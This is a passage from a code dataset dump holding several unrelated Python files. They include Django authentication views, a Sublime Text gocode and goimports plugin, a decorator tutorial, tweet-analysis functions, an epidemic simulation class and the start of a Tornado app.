for v in csv_descriptions if '=0' not in v.value_str]\n sorted_desc = sorted(csv_descriptions, key=lambda v: v.name)\n with open(args.output_file, 'w') as f:\n for desc in sorted_desc:\n f.write('{};{};{};{};{};{}\\n'.format(\n desc.name, desc.owner, desc.description, desc.obsolete,\n int(desc.weight*100), desc.value_str))\n\n logging.info('All:%s\\n Size:%d Switches:%d Not 0:%d Obsoletes:%d',\n str(set([s.name for s in csv_descriptions])),\n len(set([s.name for s in csv_descriptions])),\n len(set([s.name for s in csv_descriptions if s.weight == 1])),\n len(set([s.name for s in csv_descriptions if '0' not in s.value_str])),\n len(set([s.name for s in csv_descriptions if s.obsolete != ' '])))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/production_config_to_csv.py","file_name":"production_config_to_csv.py","file_ext":"py","file_size_in_byte":8987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"290340376","text":"from django.shortcuts import render, get_object_or_404, render_to_response\nfrom guild.models import Service, Customer, ServiceType, Provider\nfrom django.contrib import auth\nfrom django.http import HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom django.contrib.auth.forms import UserCreationForm\n\n\ndef login(request):\n c = {}\n c.update(csrf(request))\n return render_to_response('guild/index.html', c)\n\n\ndef auth_view(request):\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n auth.login(request, user)\n return HttpResponseRedirect('/guild/loggedin')\n else:\n return HttpResponseRedirect('/guild/invalid')\n\n\ndef loggedin(request):\n return render_to_response('guild/home.html', {'full_name', request.user.username})\n\n\ndef invalid(request):\n return render_to_response('guild/index.html', {'top_message': 'Please enter a valid username/password'})\n\n\ndef logout(request):\n auth.logout(request)\n return render_to_response('guild/index.html', {'top_message': 'You have successfully logged out.'})\n\n\n# Create your views here.\ndef index(request):\n latest_services_list = Service.objects.order_by('-service_date')[:5]\n context = {\n 'latest_services_list': latest_services_list,\n }\n return render(request, 'guild/index.html', context)\n\n\ndef customer_detail(request, customer_id):\n customer = get_object_or_404(Customer, pk=customer_id)\n return render(request, 'guild/customer_details.html', {'customer': customer})\n\n\ndef service_type_list(request, service_type_id):\n service_type = get_object_or_404(ServiceType, pk=service_type_id)\n providers = Provider.objects.filter(service_type=service_type)\n services = []\n for prvds in providers:\n srvs = Service.objects.filter(provider=prvds)\n services.extend(srvs)\n return render(\n request,\n 'guild/services_list_by_service_type.html',\n {'services': services, 'service_type': service_type}\n )\n\n\ndef register_user(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/guild/register_success')\n\n\n args = {}\n args.update(csrf(request))\n\n args['form'] = UserCreationForm()\n\n return render_to_response('guild/register.html', args)\n\n\ndef register_success(request):\n return render_to_response('guild/home.html', {'full_name': request.user.username, 'register_message': 'You successfully 
registered'})\n\n\ndef hamed(request):\n return render_to_response('guild/hamed.html')","sub_path":"guild/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434322666","text":"import sublime, sublime_plugin, subprocess, difflib, threading, golangconfig\n\n# go to balanced pair, e.g.:\n# ((abc(def)))\n# ^\n# \\--------->^\n#\n# returns -1 on failure\ndef skip_to_balanced_pair(str, i, open, close):\n\tcount = 1\n\ti += 1\n\twhile i < len(str):\n\t\tif str[i] == open:\n\t\t\tcount += 1\n\t\telif str[i] == close:\n\t\t\tcount -= 1\n\n\t\tif count == 0:\n\t\t\tbreak\n\t\ti += 1\n\tif i >= len(str):\n\t\treturn -1\n\treturn i\n\n# split balanced parens string using comma as separator\n# e.g.: \"ab, (1, 2), cd\" -> [\"ab\", \"(1, 2)\", \"cd\"]\n# filters out empty strings\ndef split_balanced(s):\n\tout = []\n\ti = 0\n\tbeg = 0\n\twhile i < len(s):\n\t\tif s[i] == ',':\n\t\t\tout.append(s[beg:i].strip())\n\t\t\tbeg = i+1\n\t\t\ti += 1\n\t\telif s[i] == '(':\n\t\t\ti = skip_to_balanced_pair(s, i, \"(\", \")\")\n\t\t\tif i == -1:\n\t\t\t\ti = len(s)\n\t\telse:\n\t\t\ti += 1\n\n\tout.append(s[beg:i].strip())\n\treturn list(filter(bool, out))\n\n\ndef extract_arguments_and_returns(sig):\n\tsig = sig.strip()\n\tif not sig.startswith(\"func\"):\n\t\treturn [], []\n\n\t# find first pair of parens, these are arguments\n\tbeg = sig.find(\"(\")\n\tif beg == -1:\n\t\treturn [], []\n\tend = skip_to_balanced_pair(sig, beg, \"(\", \")\")\n\tif end == -1:\n\t\treturn [], []\n\targs = split_balanced(sig[beg+1:end])\n\n\t# find the rest of the string, these are returns\n\tsig = sig[end+1:].strip()\n\tsig = sig[1:-1] if sig.startswith(\"(\") and sig.endswith(\")\") else sig\n\treturns = split_balanced(sig)\n\n\treturn args, returns\n\n# takes gocode's candidate and returns sublime's hint and subj\ndef hint_and_subj(cls, name, type):\n\tsubj = name\n\tif cls == \"func\":\n\t\thint = cls + \" \" + name\n\t\targs, returns = extract_arguments_and_returns(type)\n\t\tif returns:\n\t\t\thint += \"\\t\" + \", \".join(returns)\n\t\tif args:\n\t\t\tsargs = []\n\t\t\tfor i, a in enumerate(args):\n\t\t\t\tea = a.replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\")\n\t\t\t\tsargs.append(\"${{{0}:{1}}}\".format(i+1, ea))\n\t\t\tsubj += \"(\" + \", \".join(sargs) + \")\"\n\t\telse:\n\t\t\tsubj += \"()\"\n\telse:\n\t\thint = cls + \" \" + name + \"\\t\" + type\n\treturn hint, subj\n\ndef diff_sanity_check(a, b):\n\tif a != b:\n\t\traise Exception(\"diff sanity check mismatch\\n-%s\\n+%s\" % (a, b))\n\nclass GocodeGofmtCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tview = self.view\n\t\tsrc = view.substr(sublime.Region(0, view.size()))\n\t\tpath, env = golangconfig.subprocess_info(\"goimports\", ['GOPATH', 'PATH'], view=view)\n\t\tgofmt = subprocess.Popen([path],\n\t\t\tstdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\t\tsout, serr = gofmt.communicate(src.encode())\n\t\tif gofmt.returncode != 0:\n\t\t\tprint(serr.decode(), end=\"\")\n\t\t\treturn\n\n\t\tnewsrc = sout.decode()\n\t\tdiff = difflib.ndiff(src.splitlines(), newsrc.splitlines())\n\t\ti = 0\n\t\tfor line in diff:\n\t\t\tif line.startswith(\"?\"): # skip hint lines\n\t\t\t\tcontinue\n\n\t\t\tl = (len(line)-2)+1\n\t\t\tif line.startswith(\"-\"):\n\t\t\t\tdiff_sanity_check(view.substr(sublime.Region(i, i+l-1)), line[2:])\n\t\t\t\tview.erase(edit, sublime.Region(i, i+l))\n\t\t\telif 
line.startswith(\"+\"):\n\t\t\t\tview.insert(edit, i, line[2:]+\"\\n\")\n\t\t\t\ti += l\n\t\t\telse:\n\t\t\t\tdiff_sanity_check(view.substr(sublime.Region(i, i+l-1)), line[2:])\n\t\t\t\ti += l\n\nclass Gocode(sublime_plugin.EventListener):\n\t\"\"\"Sublime Text gocode integration.\"\"\"\n\n\tdef __init__(self):\n\t\tself.completions = None\n\n\tdef fetch_query_completions(self, view, prefix, location, gocodeFlag, path, env):\n\t\t\"\"\"Fetches the query completions of for the given location\n\n\t\tExecute gocode and parse the returned csv. Once the results are generated\n\t\tare the results in as a list stored in `completions`. Once stored is the query completions\n\t\twindow opened (forced).\n\n\t\t:param view: currently active sublime view\n\t\t:type view: sublime.View\n\t\t:param prefix: string for completions\n\t\t:type prefix: basestring\n\t\t:param locations: offset from beginning\n\t\t:type locations: int\n\t\t\"\"\"\n\n\t\tself._location = location\n\n\t\tsrc = view.substr(sublime.Region(0, view.size()))\n\t\tfilename = view.file_name()\n\t\tcloc = \"c{0}\".format(location)\n\n\t\tcmd = [path] + gocodeFlag + [\"autocomplete\", filename, cloc]\n\t\tgocode = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\n\t\tout = gocode.communicate(src.encode())[0].decode()\n\t\tresults = self.generate_completions(out)\n\n\t\t# Exit conditions:\n\t\tif len(results) == 0:\n\t\t\treturn\n\n\t\tself.completions = results\n\t\tself.open_query_completions(view)\n\n\tdef generate_completions(self, out):\n\t\t\"\"\" Parses the returned gocode results and generates a usable autocomplete list \"\"\"\n\n\t\tresults = []\n\t\tfor line in filter(bool, out.split(\"\\n\")):\n\t\t\targ = line.split(\",,\")\n\t\t\thint, subj = hint_and_subj(arg[0], arg[1], arg[2])\n\t\t\tresults.append([hint, subj])\n\n\t\treturn results\n\n\tdef open_query_completions(self, view):\n\t\t\"\"\"Opens (forced) the sublime autocomplete window\"\"\"\n\n\t\tview.run_command(\"hide_auto_complete\")\n\t\tview.run_command(\"auto_complete\", {\n\t\t\t\"disable_auto_insert\": True,\n\t\t\t\"next_completion_if_showing\": False,\n\t\t\t\"auto_complete_commit_on_tab\": True,\n\t\t})\n\n\tdef on_query_completions(self, view, prefix, locations):\n\t\t\"\"\"Sublime autocomplete event handler.\n\n\t\tGet completions depends on current cursor position and return\n\t\tthem as list of ('possible completion', 'completion type')\n\n\t\t:param view: currently active sublime view\n\t\t:type view: sublime.View\n\t\t:param prefix: string for completions\n\t\t:type prefix: basestring\n\t\t:param locations: offset from beginning\n\t\t:type locations: int\n\n\t\t:return: list of tuple(str, str)\n\t\t\"\"\"\n\t\tlocation = locations[0]\n\n\t\tif not view.match_selector(location, \"source.go\"):\n\t\t\treturn\n\n\t\tif self.completions:\n\t\t\tcompletions = self.completions\n\t\t\tself.completions = None\n\t\t\treturn completions\n\n\t\tgocodeFlag = [\"-f=csv\", \"-sock=none\"] if golangconfig.setting_value(\"gocode_serverless_mode\")[0] else [\"-f=csv\"]\n\t\tpath, env = golangconfig.subprocess_info(\"gocode\", ['GOPATH', 'PATH'], view=view)\n\t\tthread = threading.Thread(target=self.fetch_query_completions, args=(view, prefix, location, gocodeFlag, path, env))\n\t\tthread.start()\n\n\tdef on_pre_save(self, view):\n\t\tif not view.match_selector(0, 
\"source.go\"):\n\t\t\treturn\n\t\tview.run_command('gocode_gofmt')\n","sub_path":"gocode.py","file_name":"gocode.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341861717","text":"\"\"\"\r\n============================\r\nAuthor:柠檬班-木森\r\nTime:2020/5/13 21:26\r\nE-mail:3247119728@qq.com\r\nCompany:湖南零檬信息技术有限公司\r\n============================\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\n\r\n@data()\r\n\r\n\"\"\"\r\n\r\nimport time\r\n\r\nprint()\r\n\r\n\r\ndef doc(func):\r\n \"\"\"\r\n :param func: 接收被装饰的函数的\r\n :return:\r\n \"\"\"\r\n\r\n def wrapper(*args, **kwargs):\r\n print('------2-----')\r\n print('装饰器doc扩展的功能代码')\r\n # 调用原功能函数\r\n func(*args, **kwargs)\r\n print('----------执行完毕--4---------')\r\n\r\n return wrapper\r\n\r\n\r\ndef count_time(func):\r\n \"\"\"\r\n :param func: 接收被装饰的函数的\r\n :return:\r\n \"\"\"\r\n\r\n def wrapper(*args, **kwargs):\r\n # 函数调用之前获取一下当前的实际:start_time\r\n start_time = time.time()\r\n print('-------1----------')\r\n # 调用原功能函数\r\n func(*args, **kwargs)\r\n # 函数调用之后:再获取一下当前时间 end_time\r\n end_time = time.time()\r\n print('-----------5-------')\r\n print('函数运行的时间为:', end_time - start_time)\r\n\r\n return wrapper\r\n\r\n\r\n# work = count_time(doc(work))\r\n@count_time # work = count_time(work)\r\n@doc # work = doc(work)\r\ndef work(a, b):\r\n print('----3-------')\r\n print(\"a+b:\", a + b)\r\n\r\n\r\nwork(11, 22)\r\n\r\nfrom ddt import data\r\n","sub_path":"python基础高阶编程/py_04day/06一个函数被多个装饰器装饰.py","file_name":"06一个函数被多个装饰器装饰.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"197445987","text":"def chars_after_symbol(string, symbol):\r\n \"\"\" (str, str) -> list of str\r\n \r\n Return a list of all the substrings that occur after the specified symbol. \r\n A substring consists of all the characters after an occurence of the symbol \r\n until a space, punctuation, or end of tweet is reached. The substrings in \r\n the list do not include the symbol. This is meant to be a helper function \r\n because both extract_mentions and extract_hashtags can make use of it.\r\n \r\n Examples:\r\n >>> chars_after_symbol(\"Hello world\", \"@\")\r\n []\r\n >>> chars_after_symbol(\"I am #superman. Go #Superman!\", \"#\")\r\n ['superman', 'Superman']\r\n >>> chars_after_symbol(\"I'm so @cool! I have so much @power now!\", \"@\")\r\n ['cool', 'power']\r\n \r\n \"\"\"\r\n \r\n start_adding_substr = False #dictates whether to start adding to substrings.\r\n substrings = []\r\n substr_num = -1 \r\n for index in range(len(string)): \r\n if(not(string[index].isalnum()) and not(string[index] == symbol)):\r\n start_adding_substr = False \r\n elif (index != 0 and string[index] == symbol and\\\r\n string[index - 1] != \" \"):\r\n start_adding_substr = False\r\n elif(start_adding_substr):\r\n substrings[substr_num] = substrings[substr_num] + string[index]\r\n elif(string[index] == symbol):\r\n start_adding_substr = True\r\n substr_num += 1\r\n substrings.append(\"\") \r\n return substrings\r\n \r\ndef extract_mentions(tweet):\r\n \"\"\" (str) -> list of str\r\n \r\n Return a list of the mentions in the tweet parameter in the order they \r\n appear in the tweet. The returned mentions have the @ symbol removed. 
\r\n Mentions may appear more than once in the list.\r\n \r\n Examples:\r\n >>> extract_mentions(\"@Martin hello there @Martin\")\r\n ['Martin', 'Martin']\r\n >>> extract_mentions(\"Hello @Martin how is @Donald?\")\r\n ['Martin', 'Donald']\r\n >>> extract_mentions(\"I love computer science.\")\r\n []\r\n \r\n \"\"\"\r\n \r\n return chars_after_symbol(tweet, \"@\")\r\n\r\ndef extract_hashtags(tweet):\r\n \"\"\" (str) -> list of str\r\n \r\n Return a list of the hashtags in the tweet in the order that the first\r\n instance of each hashtag appears in the tweet. Hashtags may only occur once\r\n in the list. The items in the list have the # symbol removed. Note that\r\n hashtags are not case sensitive. This function converts hashtags to their\r\n lowercase form.\r\n \r\n Examples:\r\n >>> extract_hashtags(\"this is #Incredible, absolutely #incredible\")\r\n ['incredible']\r\n >>> extract_hashtags(\"this is #really #superb!\")\r\n ['really', 'superb']\r\n >>> extract_hashtags(\"hello #world \")\r\n ['world']\r\n \r\n \"\"\"\r\n \r\n total_hashtags = chars_after_symbol(tweet, \"#\")\r\n hashtags = total_hashtags[:] \r\n if(hashtags == []): \r\n return []\r\n hashtags[0] = hashtags[0].lower()\r\n index = 1\r\n while index < len(hashtags):\r\n hashtags[index] = hashtags[index].lower()\r\n if(hashtags[index] in hashtags[:index]): #no duplicate hashtags\r\n hashtags.pop(index)\r\n index -= 1\r\n index += 1\r\n return hashtags\r\n\r\ndef words_modifier(words):\r\n \"\"\" (list of str) -> NoneType\r\n \r\n Return nothing. Modifies a list of words to remove hashtags, mentions, and \r\n URLs from the list, and removing non-alphanumeric characters from words in\r\n the list. It also lowercases the words. This is a helper function for \r\n count_words.\r\n \r\n Examples:\r\n >>> words = [\"Abc\", \"@Hello\", \"#hello\", \"don't\"]\r\n >>> words_modifier(words)\r\n >>> words\r\n ['abc', 'dont']\r\n \r\n \"\"\"\r\n \r\n index = 0\r\n while index < len(words): \r\n if(words[index][0] == \"#\" or words[index][0] == \"@\"):\r\n words.pop(index) #remove hashtags and mentions\r\n index -= 1\r\n elif(len(words[index]) >= 4 and words[index][:4].lower() == \"http\"):\r\n words.pop(index) #remove URLs\r\n index -= 1 \r\n else:\r\n ch_index = 0\r\n while ch_index < len(words[index]): #remove punctuation\r\n if (not(words[index][ch_index].isalnum())):\r\n words[index] = words[index][:ch_index] + \\\r\n words[index][ch_index + 1:] \r\n ch_index -= 1\r\n ch_index += 1\r\n if(len(words) != 0):\r\n words[index] = words[index].lower()\r\n index += 1 \r\n \r\n\r\ndef count_words(tweet, word_dict):\r\n \"\"\" (str, dict of {str, int}) -> None\r\n \r\n Return nothing. This function updates the word_dictionary by adding words\r\n and updating the number of occurrences of each word in the dictionary by \r\n incrementing them by the amount of times they appear in the tweet. Words are\r\n converted to lowercase in the dictionary. 
Words are separated by whitespace\r\n and punctuation does not comprise part of the word.\r\n \r\n Examples:\r\n >>> word_dict = {\"i\": 7, \"love\": 3, \"milk\": 1}\r\n >>> count_words(\"I love chocolate milk and milk chocolate\", word_dict)\r\n >>> word_dict == {\"i\": 8, \"love\": 4, \"milk\": 3, \"chocolate\": 2, \"and\": 1}\r\n True\r\n >>> count_words(\"#cash I'm a rapper now @ChiefKeef http://gangsterrap.com\",\\\r\n word_dict)\r\n >>> word_dict == {\"i\": 8, \"love\": 4, \"milk\": 3, \"chocolate\": 2, \"and\": 1,\\\r\n \"im\": 1, \"a\": 1, \"rapper\": 1, \"now\": 1}\r\n True\r\n \r\n \"\"\"\r\n \r\n words = tweet.split(\" \") \r\n words_modifier(words)\r\n for word in words: \r\n if word in word_dict: \r\n word_dict[word] += 1\r\n else:\r\n word_dict[word] = 1 \r\n\r\ndef common_words(word_dict, max_words):\r\n \"\"\" (dict of {str, int}, int) -> None\r\n \r\n Return nothing. This function updates the dictionary to include only the \r\n most common words with a maximum of max_words in the dictionary. If there is \r\n a tie that results in there being more than max_words in the dictionary, \r\n those tied items are not included.\r\n \r\n Examples: \r\n >>> word_dict = {\"a\": 7, \"b\": 7, \"c\": 6, \"d\": 2, \"e\": 6}\r\n >>> common_words(word_dict, 2)\r\n >>> word_dict == {'a': 7, 'b': 7}\r\n True\r\n >>> word_dict = {\"a\": 7, \"b\": 7, \"c\": 6, \"d\": 2, \"e\": 6}\r\n >>> common_words(word_dict, 3)\r\n >>> word_dict == {'a': 7, 'b': 7}\r\n True\r\n >>> word_dict = {\"a\": 7, \"b\": 7, \"c\": 6, \"d\": 2, \"e\": 6}\r\n >>> common_words(word_dict, 1)\r\n >>> word_dict == {}\r\n True\r\n \r\n \"\"\"\r\n \r\n nums = []\r\n for key in word_dict:\r\n nums.append(word_dict[key])\r\n nums.sort(reverse = True)\r\n popular_nums = []\r\n index = 0\r\n occurrences = 0\r\n while index < len(nums): #copy the largest ints to popular_nums (<= N)\r\n current_occurrences = nums.count(nums[index]) \r\n occurrences += current_occurrences\r\n if(not occurrences > max_words):\r\n popular_nums.append(nums[index])\r\n else:\r\n break\r\n index += current_occurrences\r\n word_dict_copy = dict(word_dict) \r\n for key2 in word_dict_copy: #delete the less popular items\r\n if(not(word_dict[key2] in popular_nums)):\r\n del word_dict[key2]\r\n\r\ndef generate_fields(tweet_str, field_list):\r\n \"\"\" (list of str, list of str) -> int\r\n \r\n Generate all of the fields in the file and put them into field_list. 
This \r\n is a helper function for read_tweets\r\n \r\n Examples:\r\n >>> field_list = []\r\n >>> tweet_str = \"12,12,n,t,3,2Hello\"\r\n >>> generate_fields(tweet_str, field_list)\r\n >>> field_list\r\n ['12', '12', 'n', 't', '3', '2', 'Hello']\r\n \r\n \"\"\"\r\n \r\n comma_index = 0\r\n for i in range(5): #extract the first 5 fields (the ones with commas at end)\r\n new_comma_index = tweet_str.index(\",\", comma_index + 1)\r\n field_list.append(tweet_str[comma_index:new_comma_index])\r\n comma_index = new_comma_index + 1 \r\n last_two_fields = tweet_str[comma_index:]\r\n for index in range(len(last_two_fields)): #separate and extract last two\r\n if not(last_two_fields[index].isdigit()):\r\n field_list.append(last_two_fields[:index])\r\n field_list.append(last_two_fields[index:]) \r\n break\r\n for j in range(6): #remove newlines except for tweet\r\n field_list[j] = field_list[j].replace(\"\\n\", \"\") \r\n \r\ndef read_tweets(file):\r\n \"\"\" (file open for reading) -> dict of {str: list of tweet tuples}\r\n \r\n Return a dictionary with candidate names as keys and a list of tuples as\r\n values; with each tuple representing a tweet. The tuples are in the form\r\n (candidate, tweet text, date, source, favorite count, retweet count), where \r\n every item is a string except date, favorite count and retweet count which\r\n are integers.\r\n \r\n \"\"\"\r\n \r\n text = file.read()\r\n all_tweets = list(filter(None, text.split(\"<< NoneType\r\n \r\n Return nothing. This function is a helper function for most_popular. It\r\n modifies the candidate_counts and candidate_names lists of that function so \r\n that they include the popularity counts (favorites + retweets) for each \r\n candidate for candidate_counts and the names of the candidates for \r\n candidate_names. The lists are meant to be parallel.\r\n \r\n Examples:\r\n >>> cand_dict = {\"A\": [(\"A\", \"x\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"x\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"x\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"x\", 24, \"n\", 4, 4)]}\r\n >>> candidate_counts = []\r\n >>> candidate_names = []\r\n >>> update_candidate_counts_names(cand_dict, 22, 25, candidate_counts, \\\r\n candidate_names)\r\n >>> candidate_counts\r\n [34, 34]\r\n >>> candidate_names == ['A', 'B'] or candidate_names == ['B', 'A']\r\n True\r\n \r\n \"\"\"\r\n \r\n key_index = 0\r\n for key in cand_dict:\r\n candidate_counts.append(0) \r\n for index in range(len(cand_dict[key])):\r\n if (not(cand_dict[key][index][0] in candidate_names)):\r\n candidate_names.append(cand_dict[key][index][0])\r\n date = cand_dict[key][index][2]\r\n if (date1 <= date <= date2):\r\n candidate_counts[key_index] += (cand_dict[key][index][4]\\\r\n + cand_dict[key][index][5]) \r\n key_index += 1 \r\n\r\ndef most_popular(cand_dict, date1, date2):\r\n \"\"\" (dict of {str: list of tweet tuples}, int, int) -> str\r\n \r\n Return the most popular candidate between date1 and date2 (where date1 <= \r\n date2). Populartity is defined by the sum of all favorites and retweets for\r\n a given candidate's tweets in the specified timeframe. 
Return \"Tie\" if there\r\n is a tie for the most popular candidate.\r\n \r\n Examples:\r\n >>> dictionary = {\"A\": [(\"A\", \"x\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"x\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"x\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"x\", 24, \"n\", 4, 4)]}\r\n >>> most_popular(dictionary, 22, 22)\r\n 'B'\r\n >>> most_popular(dictionary, 22, 25)\r\n 'Tie'\r\n \r\n \"\"\"\r\n \r\n candidate_counts = []\r\n candidate_names = []\r\n update_candidate_counts_names(cand_dict, date1, date2, candidate_counts,\\\r\n candidate_names)\r\n max_popularity = max(candidate_counts)\r\n tie_int = 0 #this will equal (number of ties for max popularity) + 1\r\n for count in candidate_counts:\r\n if(count == max_popularity):\r\n tie_int += 1\r\n if(tie_int > 1):\r\n return \"Tie\"\r\n else:\r\n i = candidate_counts.index(max_popularity)\r\n return candidate_names[i]\r\n \r\ndef update_hashtags_names(cand_dict, candidate_hashtags, candidate_names):\r\n \"\"\" (dict of {str: list of tweet tuples}, list of str, list of str)\r\n -> NoneType\r\n \r\n Return nothing. This function is a helper function for detect_author. This\r\n function modifies both candidate_hashtags and candidate_names to include\r\n lists of hashtags for each candidate and the names of each candidate \r\n respectively.\r\n \r\n Examples:\r\n >>> dictionary = {\"A\": [(\"A\", \"h #a\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"h #b\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"h #b\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"h #c\", 24, \"n\", 4, 4), (\"B\", \"h #d\", 25, \"n\", 4, 4)]}\r\n >>> candidate_hashtags = []\r\n >>> candidate_names = []\r\n >>> update_hashtags_names(dictionary, candidate_hashtags, candidate_names)\r\n >>> candidate_hashtags == [['a', 'b'], ['b', 'c', 'd']] or\\\r\n candidate_hashtags == [['b', 'c', 'd'], ['a', 'b']]\r\n True\r\n >>> candidate_names == ['A', 'B'] or candidate_names == ['B', 'A']\r\n True\r\n \r\n \"\"\"\r\n \r\n candidate_index = 0\r\n for key in cand_dict:\r\n candidate_hashtags.append([])\r\n for index in range(len(cand_dict[key])):\r\n if(not(cand_dict[key][index][0] in candidate_names)):\r\n candidate_names.append(cand_dict[key][index][0])\r\n hashtags = extract_hashtags(cand_dict[key][index][1])\r\n for hashtag in hashtags:\r\n candidate_hashtags[candidate_index].append(hashtag)\r\n candidate_index += 1 \r\n\r\ndef find_likely_author(tweet_hashtags, candidate_hashtags, candidate_names):\r\n \"\"\" (list of str, list of str, list of str) -> str\r\n \r\n Return the most likely author of a tweet based on comparing the \r\n tweet_hashtags to the candidate_hashtags.\r\n \r\n Examples:\r\n >>> candidate_names = [\"A\", \"B\"]\r\n >>> candidate_hashtags = [[\"#a\",\"#b\"], [\"#b\", \"#c\", \"#d\"]]\r\n >>> find_likely_author([\"#a\", \"#b\"], candidate_hashtags, candidate_names)\r\n 'Unknown'\r\n >>> find_likely_author([\"#c\", \"#d\"], candidate_hashtags, candidate_names)\r\n 'B'\r\n \r\n \"\r\n \r\n \"\"\"\r\n cand_tweeter = \"\"\r\n for tweet_hashtag in tweet_hashtags:\r\n cand_count = 0 #number of candidates that use this hashtag\r\n c_hashtag = \"\" #saves the list of hashtags with tweet_hashtag\r\n for candidate_hashtag in candidate_hashtags:\r\n if tweet_hashtag in candidate_hashtag:\r\n cand_count += 1\r\n if cand_count > 1:\r\n return \"Unknown\" \r\n c_hashtag = candidate_hashtag \r\n if cand_count == 1:\r\n if(cand_tweeter == \"\"):\r\n cand_tweeter = candidate_names\\\r\n [candidate_hashtags.index(c_hashtag)]\r\n else: #compare author of this hashtag to author of previous ones\r\n 
new_cand_tweeter = cand_tweeter\r\n cand_tweeter = candidate_names\\\r\n [candidate_hashtags.index(c_hashtag)]\r\n if(cand_tweeter != new_cand_tweeter):\r\n return \"Unknown\"\r\n return cand_tweeter \r\n \r\n \r\ndef detect_author(cand_dict, tweet):\r\n \"\"\" (dict of {str: list of tweet tuples}, str) -> str\r\n \r\n Return the most likely author of the specified tweet. A candidate is the \r\n most likely author of the specified tweet if the hashtags of the tweet \r\n are used uniquely by that candidate. Return \"Unknown\" if there are no \r\n hashtags or if any of the hashtags have been used by more than one \r\n candidate.\r\n \r\n Examples:\r\n >>> dictionary = {\"A\": [(\"A\", \"h #a\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"h #b\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"h #b\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"h #c\", 24, \"n\", 4, 4), (\"B\", \"h #d\", 25, \"n\", 4, 4)]}\r\n >>> detect_author(dictionary, \"h #a #b\")\r\n 'Unknown'\r\n >>> detect_author(dictionary, \"h #c #d\")\r\n 'B'\r\n >>> detect_author(dictionary, \"h #a #e\")\r\n 'A'\r\n \r\n \"\"\"\r\n \r\n tweet_hashtags = extract_hashtags(tweet)\r\n candidate_hashtags = []\r\n candidate_names = []\r\n update_hashtags_names(cand_dict, candidate_hashtags, candidate_names)\r\n return find_likely_author(tweet_hashtags, candidate_hashtags,\\\r\n candidate_names) ","sub_path":"tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":17056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"311928396","text":"import random as rd\n\nclass World:\n\n def __init__(self, death_rate, spread_rate, disease_time, low_confinement, high_confinement):\n self.death_rate=death_rate\n self.spread_rate=spread_rate\n self.disease_time=disease_time\n self.low_confinement=low_confinement\n self.high_confinement=high_confinement\n\n ## Update all person of 'persons' which must be in the graph\n ## Return a dictionnary with the number of each state\n def update_all(self, graph, persons, p_test, n_prime):\n state={'S':0,'R':0,'D':0,'M':0,'C':0}\n for k in range(len(persons)):\n if (self.low_confinement and persons[k].is_confined):\n for i in range(len(persons[k].visited[persons[k].visited_cursor])): ## for each person visited yesterday\n persons[k].update_in_contact(persons[k].visited[persons[k].visited_cursor][i], self.death_rate, self.spread_rate, self.disease_time)\n elif not(self.high_confinement and persons[k].is_confined):\n for j in range(len(graph.adjacency[k])): ## for each nodes connected to persons[k]\n persons[k].update_in_contact(graph.adjacency[k][j], self.death_rate, self.spread_rate, self.disease_time)\n\n persons[k].update_end_of_day(self.disease_time, self.death_rate, p_test)\n\n state[persons[k].state]+=1\n if persons[k].is_confined:\n state['C']+=1\n\n #random tests each day on a random sample of n' < n persons\n sample = rd.sample(persons, n_prime)\n for j in range(len(sample)):\n sample[j].test_virus(self.disease_time,p_test)\n if sample[j].is_confined:\n state['C']+=1\n return state\n","sub_path":"World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"533652135","text":"#-*- coding:utf-8 -*-\n'''\nCreated on 2016年6月22日\n\n@author: wenbin\n'''\n\nimport tornado.web\nfrom router import Route\nimport os\nclass Application(tornado.web.Application):\n \n def __init__(self):\n settings = dict(\n gzip=True,\n 
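# template and static directories are resolved relative to this module's own location\n            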
